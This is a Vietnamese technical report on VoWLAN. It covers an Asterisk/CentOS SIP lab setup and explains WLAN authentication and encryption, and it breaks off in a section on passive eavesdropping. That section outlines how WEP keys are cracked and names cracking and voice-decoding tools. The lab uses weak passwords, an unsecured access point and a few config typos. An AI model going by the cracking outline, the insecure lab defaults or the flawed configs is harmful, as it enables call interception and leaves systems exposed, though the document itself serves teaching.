1.2. Các thành phần của hệ thống VoWLAN
Hình 1.1. Các thành phần chính của hệ thống VoWLAN
Wireless IP Phone: thiết bị này tương tự như một chiếc điện thoại cầm tay thông thường, tuy nhiên nó được tích hợp wireless LAN adapter để liên kết với hệ thống mạng điện thoại. Người dùng có thể gọi đến người dùng khác giống như một hệ thống điện thoại văn phòng, hoặc gọi ra ngoài thông qua mạng PSTN. Ngoài ra, wireless IP phone còn có thể là một phần mềm được cài đặt trên máy tính có giao tiếp wireless LAN (softphone).
Call manager: Call manager trong một hệ thống mạng VoWLAN thay thế vị trí của private branch exchange (PBX) truyền thống. Nó xử lý các cuộc gọi trong mạng và quản lý các chức năng như đăng ký IP phone, quản trị hoạch định việc quay số và định tuyến, và quản lý thư thoại.
Voice gateway: thiết bị này giúp mạng thoại IP giao tiếp với các loại mạng và hệ thống khác. Ví dụ, một gateway có thể nối một mạng VoIP với mạng PSTN truyền thống, đường dẫn này giúp cho một điện thoại IP có thể giao tiếp với điện thoại thông thường. Và kết nối gateway còn có chức năng backup cho trường hợp mạng WAN bị mất kết nối.
Hạ tầng Wireless LAN: mạng wireless-LAN có vai trò quản lý việc truyền tải các cuộc thoại wireless VoIP. Nhờ đó, người dùng điện thoại có thể di chuyển tự do trong khu vực làm việc. Hạ tầng wireless LAN thường bao gồm các access point thông thường.
Phần tiếp theo: Cài đặt Asterisk trên CentOS
1.3. Dựng mô hình VoWLAN bằng Asterisk
Hình 1.2. Mô hình VoWLAN với Asterisk Server
1.3.1.Cài đặt Asterisk trên CentOS
Cài đặt các thư viện cần thiết:
Sau khi cài đặt, CentOS gần như chứa đầy các thư viện cần thiết.
Tuy nhiên vẫn thiếu hai thư viện để cài đặt được Asterisk trên CentOS.
Hình 1.3. Báo lỗi thiếu C compiler khi thực hiện ./configure
Hình 1.4. Lỗi thiếu termcap
Install GCC và Termcap:
-Vào Application->Add/Remove Program, chọn các gói tương ứng để cài đặt
Hình 1.5. Install GCC
Hình 1.6. Install Termcap
-Apply và chờ quá trình cài đặt kết thúc.
Install Asterisk:
-Download các gói cần thiết. Trong phần này chỉ thực hiện mô phỏng với softphone nên chỉ cần core asterisk.
-
Hình 1.7. Trang chủ Asterisk
-Tạo thư mục asterisk trong /usr/src
-Chép file asterisk vừa download vào và giải nén.
-Thực hiện tuần tự các lệnh compile và install asterisk. Chú ý phải thực hiện trên quyền root.
./configure
Hình 1.8. Quá trình check config
Hình 1.9. Hoàn thành check configure
Make menuselect
Hình 1.10. Tùy chọn cài đặt thêm các gói
Gặp lỗi: “Install ncurses to user menu graphics!” khi sử dụng make menuselect
Fix: Vào Add/Remove Program, cài đặt thêm thư viện ncurses
Hình 1.11. Cài đặt thư việc ncurses
Thực hiện compile lại.
Make distclean
./configure
Make menuselect
Sau khi chọn các gói xong, nhấn “s” để save menu select
Make
Hình 1.12. Thực hiện lệnh Make
Make install
Nếu trong quá trình make menuselect có chọn thêm các gói thì các gói sẽ tự động được download về.
Hình 1.13. Thực hiện lệnh make install
Sau khi make install xong thì quá trình cài đặt đã hoàn thành, ngoài ra có thêm hai tùy chọn không bắt buộc là make progdocs (tài liệu của chương trình) và make samples (tạo file cấu hình mẫu)
Hình 1.14. Make install hoàn thành
ận hành asterisk
-Sau khi cài đặt xong asterisk sẽ tự động được vận hành. Vào Command Line Interface (CLI) bằng lệnh: asterisk -c
-Để chạy asterisk, trong terminal dùng lệnh: asterisk -r
-Nếu asterisk đang chạy sẽ nhận được thông báo lỗi. Vào CLI bằng lệnh asterisk -c
Hình 1.15. Vận hành Asterisk
-Stop asterisk.
Trong CLI: stop now
Cài đặt Asterisk-Gui
Mục đích cài đặt asterisk-gui là giúp nhà quản trị có thể cấu hình asterisk thông qua giao diện web. Asterisk-Gui được download và cài đặt từ SVN
http://svn.digium.com/svn/asterisk-gui/trunk
svn checkout http://svn.digium.com/svn/asterisk-gui/trunk /usr/src/asterisk/asterisk-gui
Thực hiện: make và make install để cài đặt asterisk-gui
1.3.2. Thực hiện cuộc gọi giữa PC 101 và PC 102
Đặt IP cho PC 101: 192.168.1.4
Đặt IP cho PC 101: 192.168.1.5
IP của Asterisk server: 192.168.1.2
Tạo user trong file sip.conf
[101]
type=friend
secret=123456
host=dynamic
port=5060
nat=no; cùng bên với firewall
[102]
type=friend
secret=1234
host=dynamic
port=5060
nat=no
Tạo ngữ cảnh trong file extensions.conf
[m101]
exten => 102,1,Anser
exten => 102,2,Dial(SIP/102)
exten =>102,3 Hangup
[m102]
exten => 101,1,Answer
exten => 101,2,Dial(SIP/101)
exten => 101,3,Hangup
Tiến hành cấu hình Access point : địa chỉ 192.168.1.1, SSID là thuctap, phần Security để đơn giản có thể chọn No Security.
Hình 1.16. Cấu hình SSID cho AP
Sau đó kết nối PC 01 và PC 02 vào AP.
Tiến hành thực hiện register user ở hai máy PC 101 và PC 102, quá trình register không thành công và báo lỗi Request Timeout. User không kết nối được với server Asterisk.
Hình 1.17. Cấu hình cho PC 102
Hình 1.18. Lỗi kết nối
Nguyên nhân là do Firewall của CentOS đã chặn các kết nối nên các client không liên lạc được với server.
Khắc phục:
Ta có thể disable Firewall trên Asterisk server, tuy nhiên cách này sẽ gây nguy hiểm cho server, vì vậy ta nên mở port của giao thức SIP (port UDP 5060) để được phép qua firewall.
Hình 1.19. Mở port giao thức SIP trên server
Kết quả: Đã gọi qua lại được giữa 2 user 101 và 102 và gọi thử vào ngữ cảnh đơn giản.
Hình 1.20. PC 102 kết nối thành công với PC 101
Chương 2: BẢO MẬT TRONG VOWLAN
2.1. Tổng quan về WLAN Security
2.1.1 Xác thực:
Chuẩn IEEE 802.11 định nghĩa hai phương pháp xác thực cơ bản: xác thực hệ thống mở: Open System Authentication (OSA) và xác thực khóa chia sẻ Shared Key Authentication (SKA). Cả hai phương pháp này đều mắc phải những lỗi bảo mất nghiêm trọng khiến cho kẻ tấn công có thể dễ dàng thâm nhập vào hệ thống mạng để theo dõi, phá hoại hay lấy cắp thông tin. Sự ra đời của WPA/WP2 cùng chuẩn IEEE 802.11i – 2004 đã khắc phục được hầu hết những nguy cơ về mất an toàn thông tin kể trên, nếu được cấu hình cài đặt một cách thích hợp và đúng cách.
2.1.1.1 Open System Authentication
Xác thực Hệ thống mở OSA được xem như phương pháp xác thực mặc định của chuẩn IEEE 802.11 thời kì đầu. Các bước xác thực được tiến hành như sau:
1.Client truyền một khung xác thực chứa mã chỉ ra rằng phương pháp xác thực được sử dụng sẽ là OSA về phía AP.
2.AP sau khi nhận được khung xác thực này sẽ truyền một bản tin ACK báo nhận về phía client.
3.Sau đó AP sẽ truyền tiếp một khung xác thực về phía client để chỉ ra rằng quá trình xác thực là hợp lệ.
4.Client sau khi nhận được khung xác thực này sẽ truyền một bản tin ACK báo nhận về phía AP. Đến đây toàn bộ quá trình xác thực đã thành công!
Hình 2.1. Xác thực Hệ thống mở OSA
Thực chất, OSA luôn luôn báo nhận dương với tất cả các client muốn kết nối đến nó! Tuy nhiên, nói như vậy không có nghĩa là việc đảm bảo tính riêng tư cá nhân bị xâm phạm. Các thông tin dữ liệu trao đổi giữa client và AP có thể được mã hóa sử dụng cơ chế WEP. Thật đáng tiếc, WEP lại mắc phải quá nhiều yếu điểm, rất dễ bị tấn công. Nhưng dù sao nó cũng đã làm tốt sứ mệnh lịch sử của mình, đánh dấu một cái nhìn đúng đắn hơn về khía cạnh an toàn thông tin trong truyền thông, nhất là với thông tin vô tuyến.
2.1.1.2 Shared Key Authentication
Xác thực Khóa chia sẻ SKA sử dụng WEP cho quá trình xác thực. WEP cũng có thể cung cấp mã hóa các dữ liệu MAC, nhưng ở đây cần chú ý rằng WEP chỉ được xem như kỹ thuật nhằm bảo vệ trước các hoạt động nghe lén không mục đích, vô tình chứ không có ý nghĩa nhiều đối với các loại hình tấn công có chủ tâm khác. Do WEP có rất nhiều điểm yếu, khuyến cáo không nên dùng WEP để mã hóa dữ liệu cũng như dùng SKA để xác thực.
Khi sử dụng xác thực SKA, cả client và AP phải dùng chung một khóa WEP. AP lưu trữ nhiều khóa WEP vì vậy các client có thể kết nối tới cùng một AP bằng các khóa WEP khác nhau. Các bước xác thực được tiến hành như sau:
1.Đầu tiên, client gửi một khung xác thực về phía AP để chỉ ra rằng xác thực SKA sẽ được sử dụng.
2.AP sau khi nhận được khung xác thực này sẽ gửi bản tin ACK báo nhận về phía client.
3.Tiếp theo, AP gửi một khung xác thực trong đó có chứa 128 octet dưới dạng cleartext về phía client.
4.Client sau khi nhận được khung xác thực này sẽ gửi bản tin ACK báo nhận về phía AP.
5.Client sẽ mã hóa 128 octet này bằng khóa WEP của mình sau đó gửi chúng về phía AP trong một khung xác thực tiếp theo.
6.AP sau khi nhận được khung xác thực này sẽ gửi bản tin ACK báo nhận về phía client.
7.AP sẽ giải mã đoạn 128 octet nhận được từ client và so sánh với 128 octet gốc của minh. Nếu chúng giống nhau, AP sẽ trả lời bằng việc gửi một khung xác thực cuối cùng về phía client để khẳng định xác thực thành công. Trường hợp ngược lại, nếu chúng không trùng khớp, AP sẽ báo xác thực lỗi.
8.Bước cuối cùng, client sau khi nhận được trả lời từ phía AP, sẽ gửi bản tin ACK báo nhận.
Hình 2.2. Xác thực Khóa chia sẻ SKA
Quá trình xác thực SKA có vẻ phức tạp hơn OSA, song thực tế SKA lại kém an toàn hơn so với OSA! Trong xác thực SKA, WEP được sử dụng. Sau khi quá trình xác thực thành công, vẫn khóa WEP này lại dùng để mã hóa các khung dữ liệu trao đổi giữa AP và client. Còn với xác thực OSA, WEP không được sử dụng cho quá trình xác thực, nhưng WEP có thể được dùng để mã hóa dữ liệu truyền dẫn. Vấn đề nảy sinh là ở chỗ, trong quá trình xác thực SKA, AP ban đầu gửi 128 octet dưới dạng cleartext về phía client, sau đó client sẽ dùng khóa WEP để mã hóa 128 octet này rồi gửi trả lại về AP. Như vậy, nếu kẻ tấn công sử dụng các công cụ nắm bắt và phân tích gói tin thì có thể dễ dàng lấy được hai đoạn bản tin 128 octet này bao gồm cả cleartext và đã được mã hóa. Dựa vào đây, việc tìm ra khóa WEP sẽ nhanh chóng và đơn giản hơn nhiều! Tuy nhiên, hiện nay danh giới về sự an toàn giữa hai phương pháp xác thực này gần như đã bị xóa nhòa, bởi vì trên cộng đồng mạng internet, số lượng các công cụ có chức năng dò tìm khóa WEP xuất hiện rất nhiều. Kẻ tấn công chỉ mất chưa đến 10 phút đã có thể tìm ra khóa WEP một cách dễ dàng, không phân biệt phương pháp xác thực được sử dụng là OSA hay SKA!
2.1.1.3. Xác thực dựa trên IEEE 802.1X/EAP
Chuẩn IEEE 802.1X xác thực theo cổng. Các thành phần tham gia vào quá trình này bao gồm Supplicant, Authenticator và Authentication Server. Đối với mạng WLAN thì client đóng vai trò của Supplicant, AP như Authenticator, còn Authentication Server là một máy chủ có chức năng xác thực ví dụ như RADIUS server chẳng hạn. Trong đó, kết nối giữa Authenticator và Authentication Server được xem như là đã được thiết lập an toàn rồi, có thể dùng SSL để trao đổi dữ liệu. Chuẩn IEEE 802.1X sử dụng hai khái niệm: Cổng điều khiển và Cổng không điều khiển đối với Authenticator. Khi tiến hành xác thực, Cổng không điều khiển mở và Supplicant trao đổi dữ liệu với Authenticator thông qua cổng này. Cổng điều khiển chỉ được mở khi Supplicant đã xác thực thành công, phục vụ cho quá trình thiết lập và trao đổi khóa, tiếp sau đó là trao đổi dữ liệu. IEEE 802.1X cho phép sử dụng nhiều kiểu xác thực khác nhau được biết đến với tên gọi chung Giao thức xác thực mở rộng EAP. Quá trình xác thực dựa trên IEEE 802.1X/EAP diễn ra như sau (các khung báo nhận ACK sẽ không được đề cập đến ở đây):
Hình 2.3. Xác thực IEEE 802.1X/EAP
1.Client gửi yêu cầu xác thực tới AP để bắt đầu quá trình.
2.AP sau khi nhận được khung yêu cầu xác thực của client sẽ gửi khung yêu cầu nhận dạng về phía client.
3.Client trả lời bằng khung xác thực chứa thông tin nhận dạng của mình tới AP.
4.AP chuyển tiếp thông tin nhận dạng của client về cho Máy chủ xác thực.
5.Sau khi nhận được những thông tin này, Máy chủ xác thực sẽ yêu cầu các thông tin xác thực cần thiết trong khung xác thực tiếp theo gửi về AP.
6.AP thực hiện chuyển tiếp các yêu cầu này tới client.
7.Client hồi đáp các thông tin xác thực cần thiết gửi về AP.
8.AP chuyển tiếp những thông tin này cho Máy chủ xác thực.
9.Sau khi kiểm tra các thông tin trên của client, Máy chủ xác thực sẽ quyết định client có được phép tham gia vào mạng hay không bằng việc gửi kết quả xác thực về cho AP.
10.AP thông tin lại cho client.
Trong toàn bộ quá trình này AP đóng vai trò như một cầu nối giữa client và Máy chủ xác thực. Mọi thông tin trao đổi đều được thực hiện qua Cổng không điều khiển. Có nhiều kiểu giao thức EAP cho phép được sử dụng như: EAP-MD5, EAP-LEAP, EAP-TLS, TTLS, PEAP, EAP-FAST, trong đó EAP-TLS thường được sử dụng. Kết thúc quá trình này, Cổng điều khiển được mở, các thiết bị thực hiện công việc trao đổi và thiết lập khóa.
Nếu giao thức xác thực EAP trước đó sử dụng là xác thực hai chiều thì khóa PMK sẽ được tạo ra trong bước này. Khi ấy, cả client và Máy chủ xác thực đều biết rõ về nhau nên thống nhất chung một khóa. Khóa này có ý nghĩa trên từng phiên làm việc và với từng client. Máy chủ xác thực sau đó sẽ tạo ra một bản sao của khóa PMK rồi gửi về AP. Nhờ đó, AP và client đã có chung khóa PMK. Trong trường hợp hệ thống mạng không sử dụng Máy chủ xác thực, khóa PMK sẽ được tạo ra từ khóa tĩnh nhập vào thủ công trước đó, trên cả client và AP.
Bắt tay bốn bước
Quá trình bắt tay bốn bước được thực hiện giữa AP và client sau khi đã có khóa PMK. Quá trình này nhằm tạo ra các khóa PTK và GTK.
Đầu tiên, AP tạo ra số ANonce rồi gửi về client. Client sử dụng khóa PMK để sinh ra khóa PTK, sau đó dùng khóa PTK này kết hợp với số ANonce để tạo ra mã MIC. Mục đích của việc làm này là để AP xác định xem client thực sự có khóa PMK chính xác không. Sau khi tạo ra mã MIC rồi, client cũng sinh ra số SNonce của mình và gửi về phía AP. AP nhận được những thông tin này, dựa vào mã MIC để khẳng định rằng client có cùng khóa PMK giống mình. Sau đó AP cũng phải sử dụng khóa PMK của mình để sinh ra khóa PTK, dùng khóa PTK này kết hợp với số SNonce để tạo ra mã MIC. Cũng trong lúc này, AP sử dụng khóa GMK tạo ra khóa GTK. Khóa GTK, mã MIC cùng với số Anonce mới sẽ được mã hóa bằng khóa PTK và gửi về phía client. Client dùng khóa PTK của mình để giải mã, sau đó kiểm tra mã MIC để chắc chắn rằng AP cũng có khóa PMK giống mình. Sau đó client tiến hành cài đặt các khóa PTK và GTK. Khóa PTK được dùng để mã hóa các bản tin unicast, có giá trị duy nhất dành cho mỗi client. Khóa GTK được dùng để mã hóa các bản tin multicast, broadcast, có giá trị chung giống nhau cho nhiều client hợp pháp. Cuối cùng client gửi bản tin xác nhận về phía AP. AP thực hiện cài đặt khóa phục vụ cho quá trình trao đổi thông tin tiếp sau. Từ lúc này, mọi dữ liệu trao đổi unicast giữa AP và client sẽ được mã hóa bằng khóa PTK, với multicast và broadcast được mã hóa bằng khóa GTK.
Hình 2.4. Quá trình bắt tay bốn bước
2.1.2. Mã hóa
Mã hóa thực chất là quá trình thể hiện thông tin cần bảo mật dưới một dạng khác. Thông tin này chỉ có thể đọc được theo đúng nghĩa nếu như phía thu có khóa để giải mã ngược lại. Mã hóa đóng vai trò hết sức quan trọng trong việc đảm bảo thông tin không bị lộ, nhất là với môi trường vô tuyến của mạng WLAN, khi mà việc nghe trộm thông tin gần như không thể ngăn chặn được.
2.1.2.1. Mã hóa WEP
WEP là phương pháp mã hóa lớp 2 sử dụng thuật toán mã hóa dòng RC4. WEP ra đời nhằm ba mục đích chính: đảm bảo tính bảo mật, điều khiển truy nhập và toàn vẹn dữ liệu. Trong đó, việc đảm bảo tính bảo mật được thực hiện bằng cách mã hóa dữ liệu truyền dẫn. Khóa WEP tĩnh được sử dụng như một cơ chế điều khiển truy nhập, chỉ những client nào có khóa WEP giống như của AP mới được phép tham gia vào mạng. Bên cạnh đó,WEP sử dụng giá trị ICV để đảm bảo dữ liệu không bị sửa đổi. Giá trị ICV được tính toán dựa trên dữ liệu cần truyền dẫn, trước khi nó được mã hóa. WEP có hai phiên bản là 64 bit và 128 bit. Khóa WEP bao gồm 24 bit IV và 40 bit (đối với WEP 64 bit) hay 104 bit khóa tĩnh (đối với WEP 104 bit). Sự xuất hiện của 24 bit IV nhằm mục đích đảm bảo với các khung dữ liệu khác nhau thì sẽ được mã hóa bằng các khóa khác nhau. Giá trị IV này sẽ được lấy ngẫu nhiên đối với từng khung dữ liệu. Tuy nhiên, với 24 bit IV này, tương đương với chỉ có khoảng 16.777.216 khóa WEP khác nhau được tạo ra. Sau đó, nếu cần, chúng sẽ được sử dụng lại.
Quá trình mã hóa WEP diễn ra như sau: Đầu tiên, WEP chạy thuật toán CRC trên dữ liệu gốc để tạo ra giá trị ICV, giá trị này sau đó được gắn vào phía sau của phần dữ liệu. Một giá trị IV 24 bit được tạo ra và kết hợp với khóa tĩnh. WEP sau đó sẽ sử dụng một bộ tạo số giả ngẫu nhiên với đầu vào là giá trị IV và khóa tĩnh nhằm tạo ra một chuỗi số mới. Chuỗi số này có cùng độ dài với phần dữ liệu cần mã hóa. Tiếp theo chúng được đưa kết hợp lại với nhau bằng thuật toán XOR. Kết quả chính là dữ liệu đã được mã hóa. Phần dữ liệu mã hóa này sẽ được gắn thêm tiền tố là giá trị IV 24 bit dưới dạng cleartext. Cuối cùng, chúng được phát đến phía thu.
Tại phía thu, giá trị IV được tách ra, kết hợp với khóa tĩnh, thông qua bộ tạo số giả ngẫu nhiên, cũng sinh ra một chuỗi số giống như bên phát. Chuỗi số này sẽ được dùng để tìm ra dữ liệu gốc ban đầu bằng việc XOR ngược cùng với chuỗi dữ liệu mã hóa đã nhận được.
Hình 2.5. Quá trình mã hóa và giải mã WEP
Thật không may, WEP có không ít điểm yếu để kẻ tấn công có thể lợi dụng, các điểm yếu này có thể kể đến như sau:
Xung đột giá trị IV: Bởi vì giá trị IV chỉ gồm có 24 bit nên trong một mạng có lưu lượng lớn, giá trị này sẽ bị sử dụng lại rất nhanh. Dựa vào hiện tượng này, kẻ tấn công có thể dễ dàng tìm ra khóa WEP hơn.
Các khóa yếu: Do bản thân thuật toán RC4 được sử dụng mà dựa trên một số khóa IV yếu, kẻ tấn công có thể tìm ra khóa WEP đơn giản và nhanh chóng hơn.
Bơm gói tin: Đối với những mạng có lưu lượng thông tin thấp, kẻ tấn công có thể sử dụng các công cụ bơm gói tin nhằm gia tăng lưu lượng để nắm bắt các gói tin có ích.
Thay đổi gói tin: Việc kiểm tra tính toàn vẹn của gói tin dựa trên giá trị ICV không thực sự đáng tin cậy. Các gói tin mã hóa bằng WEP vẫn có thể bị thay đổi.
Thực tế hiện nay, kẻ tấn công có thể sử dụng các công cụ bẻ khóa WEP một cách dễ dàng trong vòng từ 5 đến 10 phút! Quá trình này sẽ được đề cập đến trong phần tiếp theo.
2.1.2.2. Mã hóa TKIP
TKIP là một phương pháp mã hóa tùy chọn theo chuẩn IEEE 802.11i. TKIP cũng sử dụng thuật toán RC4 để mã hóa giống như WEP. Thực chất, TKIP được xem như một sự mở rộng của WEP, khắc phục hoàn toàn những điểm yếu mà WEP mắc phải. TKIP sử dụng 128 bit khóa tĩnh kết hợp với 48 bit IV, địa chỉ MAC nguồn, MAC đích nhằm tạo ra một khóa phức hợp, có giá trị khác nhau đối với từng gói tin. Với 48 bit IV, tương đương 281.474.976.710.656 giá trị mà IV có thể nhận, cùng với quá trình tính toán khóa phức tạp, TKIP đã ngăn chặn được hai điểm yếu của WEP là Xung đột giá trị IV và Khóa yếu. TKIP cũng sử dụng phương pháp đếm số thứ tự để chống lại việc bơm gói tin mà kẻ tấn công hay lợi dụng. Thêm vào đó, TKIP tính toán mã toàn vẹn bản tin MIC dựa trên thuật toán Michael, được đánh giá là mạnh hơn nhiều so với CRC mà WEP sử dụng, do đó đảm bảo gói tin không bị thay đổi.
Bởi vì TKIP sử dụng nhiều thành phần để tạo khóa hơn, cùng với giá trị MIC được tính toán, nó làm tăng thêm 20 byte không mang thông tin vào khung dữ liệu, trong khi với WEP chỉ cần 8 byte. TKIP cũng sử dụng thuật toán mã hóa RC4 nên không đòi hỏi năng lực xử lý của chíp nhiều, do đó phần lớn các card cũ sử dụng mã hóa WEP có thể được nâng cấp firmware để hỗ trợ tương thích với TKIP. TKIP là lựa chọn thích hợp giúp giảm thiểu chi phí đầu tư nâng cấp thiết bị kết nối mạng, hơn nữa vẫn hoàn toàn tuân theo tiêu chuẩn WPA của Wifi Alliance đưa ra.
2.1.2.3. Mã hóa CCMP
CCMP được xem như là phương pháp mã hóa mặc định theo chuẩn IEEE 802.11i. Phương pháp này sử dụng thuật toán mã hóa tiên tiến AES (thuật toán Rijndael). CCMP/AES sử dụng khóa có độ dài 128 bit để mã hóa mỗi khối dữ liệu cũng có chiều dài cố định là 128 bít. Mã kiểm tra tính toàn vẹn của bản tin 8 bit MIC được đánh giá là mạnh hơn so với của TKIP. Bởi vì thuật toán mã hóa AES là rất mạnh nên việc mã hóa trên từng gói tin là không cần thiết.
Mã hóa CCMP/AES sẽ làm tăng thêm 16 byte không mang thông tin vào khung dữ liệu. Bởi vì thuật toán AES yêu cầu năng lực xử lý của chip lớn nên các card mạng không dây cũ không thể đáp ứng được. Những card mạng này không thể dùng biện pháp nâng cấp firmware như đối với TKIP mà phải tiến hành nâng cấp về phần cứng mới có thể hỗ trợ CCMP/AES hay WPA2. Chính vì điều này đã làm cản trở việc triển khai WPA2 rộng rãi. Tuy nhiên, với các mạng yêu cầu mức độ bảo mật cao, khuyến nghị nên chọn thay đổi về phần cứng để hỗ trợ WPA2. Hiện nay, một số hãng sử dụng giải pháp phần mềm nhằm thực hiện việc này, song thực tế cho thấy, năng lực xử lý của card sẽ rất chậm, và nguy cơ xảy ra sai sót là rất cao cũng như không đảm bảo mức độ ổn định cần thiết cho tín hiệu.
2.1.3. Tiêu chuẩn an ninh WPA/WPA2
Tổ chức Liên minh các nhà sản xuất lớn về thiết bị wifi – Wifi Alliance, được thành lập để giúp đảm bảo tính tương thích giữa các sản phẩm wifi của các hãng khác nhau. Nhằm cải thiện mức độ an toàn về mặt thông tin trong mạng 802.11 mà không cần yêu cầu nâng cấp phần cứng, Wifi Alliance thông qua TKIP như một tiêu chuẩn bảo mật cần thiết khi triển khai mạng lưới được cấp chứng nhận Wifi. Kiểu bảo mật này được gọi với tên là WPA. WPA ra đời trước khi chuẩn IEEE 802.11i – 2004 được chính thức thông qua. Nó bao gồm việc quản lý khóa và quá trình xác thực. Tiếp sau đó, WPA2 được đưa ra, như một tiêu chuẩn bảo mật bám sát hơn theo chuẩn 802.11i của IEEE. Điểm khác biệt lớn nhất giữa WPA và WPA2 là thay vì sử dụng AES để đảm bảo tính bảo mật và toàn vẹn dữ liệu thì WPA dùng TKIP cho việc mã hóa và thuật toán Michael cho việc xác thực trên từng gói dữ liệu.
Mỗi phiên bản của WPA đều được chia thành hai loại: Personal dành cho hộ gia đình và văn phòng quy mô nhỏ, Enterprise dành cho doanh nghiệp lớn có cơ sở hạ tầng mạng đầy đủ. Điểm khác biệt duy nhất đáng kể giữa hai loại này là ở hình thức có được khóa PMK. Với Personal, khóa PMK sinh ra từ khóa tĩnh được nhập vào thủ công trên AP và các client. Rõ ràng cách làm này là không khả thi đối với các mạng lưới có quy mô lớn. Do đó trong Enterprise, khóa PMK nhận được từ quá trình xác thực IEEE 802.1X/EAP. Việc cấp phát khóa này là hoàn toàn tự động và tương đối an toàn. Sau khi đã xác thực lẫn nhau rồi, client và Máy chủ xác thực xây dựng khóa PMK dựa trên các thông tin đã biết. Khóa này là giống nhau trên cả client và Máy chủ xác thực. Máy chủ xác thực sẽ tiến hành sao chép một bản khóa PMK này rồi gửi về cho AP. Lúc này, cả AP và client đều đã nhận được khóa PMK phù hợp. Trong thực tế, Máy chủ xác thực thường được sử dụng là Máy chủ RADIUS.
So sánh giữa WEP, WPA và WPA2
WPA được đánh giá là kém an toàn hơn so với người anh em WPA2. Tuy nhiên, lợi thế của WPA là không yêu cầu cao về phần cứng. Do WPA sử dụng TKIP mã hóa theo thuật toán RC4 giống như WEP nên hầu hết các card mạng không dây cũ hỗ trợ WEP chỉ cần được nâng cấp firmware là có thể hoạt động tương thích với tiêu chuẩn của WPA.
WPA2 sử dụng CCMP/AES cho việc mã hóa dữ liệu và kiểm tra tính toàn vẹn của gói tin. CCMP/AES là một cơ chế mã hóa rất mạnh và phức tạp do đó yêu cầu cao về năng lực xử lý của chip. Cũng chính vì điều này mà hiện nay WPA2 chưa được triển khai rộng dãi như WPA. Lý do là WPA2 cần phải nâng cấp về mặt phần cứng, tốn kém hơn nhiều so với viêc cập nhật firmware đối với WPA. Tuy nhiên, với các hệ thống mạng yêu cầu mức độ an ninh cao thì khuyến nghị nên sử dụng WPA2. Việc lựa chọn tiêu chuẩn an ninh nào là hoàn toàn phụ thuộc vào sự cân bằng giữa tiềm lực tài chính và mức độ an toàn thông tin cần đảm bảo.
2.2. Các nguy cơ và biện pháp đảm bảo thông tin trong VoWLAN
2.2.1. Tấn công bị động
Tấn công bị động (hay nghe lén) là khi kẻ tấn công lấy cắp thông tin được trao đổi giữa hai thực thể nguồn và đích hợp pháp, nhưng không tác động đến hai thực thể này cũng như đến quá trình truyền thông. Các thông tin này sau khi lấy cắp sẽ được sử dụng cho những mục đích tấn công khác như xâm nhập ở mức độ sâu hơn hay giả mạo thực thể hợp pháp. Quá trình tấn công bắt đầu bằng việc thu giữ các gói tin, tiến hành giải mã, sau đó trích ra những thông tin cần thiết như thông tin xác thực, mật khẩu, số thẻ tín dụng, thông tin cá nhân, sở hữu trí tuệ hay các dữ liệu nhạy cảm khác. Đôi khi, kiểu tấn công này cũng được sử dụng với mục đích phân tích các luồng lưu lượng, thống kê, báo cáo để nhận biết thuộc tính lưu lượng trong mạng phục vụ cho công việc quản trị đạt hiệu quả cao hơn.
Bản chất môi trường truyền thông trong mạng WLAN là dựa trên sóng điện từ, do đó việc bị nghe trộm là không thể tránh khỏi. Tuy nhiên cũng có thể triển khai những biện pháp sau nhằm giảm thiểu nguy cơ thông tin có ích bị kẻ tấn công lấy cắp được. Đầu tiên phải tiến hành đo kiểm và thiết kế vùng che phủ sóng wifi thật tỉ mỉ và kỹ lưỡng sao cho tín hiệu wifi không bị tràn ra quá xa khu vực cần thiết, tránh việc sử dụng trái phép và gây hại cho tài nguyên mạng. Phương pháp này chỉ có ý nghĩa tương đối đảm bảo an toàn về mặt vật lý. Biện pháp thứ hai, đóng vai trò quyết định đó chính là sử dụng các cơ chế mã hóa an toàn cho toàn bộ quá trình xác thực và truyền dữ liệu.
Khi mạng Wifi mới ra đời, WEP được sử dụng như một tùy chọn cho việc mã hóa. Tuy nhiên, WEP ra đời chưa được bao lâu thì đã bộc lộ những điểm yếu không thể khắc phục. Việc sử dụng thêm giá trị IV là nguyên nhân chính của đa số các vấn đề với WEP. Giá trị IV này được truyền dưới dạng không mã hóa nên có thể bị nghe trộm dễ dàng. Bởi vì IV chỉ có độ dài 24 bit tương đương với khoảng hơn 16.000.000 giá trị nên trong những mạng Wifi có lưu lượng trao đổi thông tin lớn thì chỉ mất khoảng từ 5 dến 10 phút các giá trị IV này sẽ bị sử dụng lại, gọi là hiện tượng xung đột IV. Lợi dụng điều này kẻ tấn công dễ dàng tìm ra WEP key hơn, nhất là khi sử dụng các giá trị IV yếu. Đối với các mạng Wifi có lưu lượng thấp, biện pháp bơm gói tin được thực hiện nhằm tăng lưu thông mạng để nhanh chóng nắm bắt được đủ số lượng gói tin cần thiết. Một khi đã thu thập đủ lượng gói tin nhất định rồi, công việc tiếp theo cần làm là chạy chương trình giải mã để tìm ra WEP key (sơ đồ đầy đủ trong hình). Tất cả quá trình này chỉ mất khoảng từ 5 đến 10 phút! Một số phần mềm thường được sử dụng là bộ công cụ AirCrack, WEPcrack, WEPoff, …
Hình 2.6. Các bước bẻ khóa WEP
Cuối cùng, phần dữ liệu thoại trong các gói tin sẽ được giải mã bằng bộ giải mã thoại như VOMIT (cho G.711) và IP Crack (cho G.729A) hay các chương trình có chức năng tương tự khác.
Để khắc phục những nhược điểm mà WEP mắc phải, sự ra đời của WPA/WPA2 như một sự tất yếu. Do đặc thù của dịch vụ VoWLAN, độ trễ cần phải được giảm xuống đến mức tối thiểu, nên trong các cấu hình mạng thường xác thực bằng WPA/WPA2 PSK sử dụng mã hóa TKIP/RC4. Ưu điểm của lựa chọn này ở chỗ, WPA/WPA2 PSK không yêu cầu hệ thống mạng phải có máy chủ làm nhiệm vụ xác thực, giảm độ phức tạp. Không những thế mã hóa TKIP/RC4 được lựa chọn do TKIP cũng dựa trên thuật toán mã hóa RC4 giống như WEP nhưng đã khắc phục được hầu hết các hạn chế của WEP, bằng việc dùng khóa 128 bit, 48 bit IV, kết hợp với địa chỉ MAC của thiết bị nguồn và đích để tạo ra khóa. TKIP còn có cơ chế chống tấn công bơm gói tin và sử dụng MIC để kiểm tra tính toàn vẹn của gói tin. Đặc biệt, các thiết bị hỗ trợ WEP đều có thể nâng cấp firmware để cung cấp mã hóa TKIP do TKIP không yêu cầu cao về năng lực xử lí của phần cứng. Tuy nhiên, WPA/WPA2 PSK cũng có một nhược điểm nhỏ đó là không chống lại được hình thức tấn công kiểu social engineering.
2.2.2. Truy cập trái phép
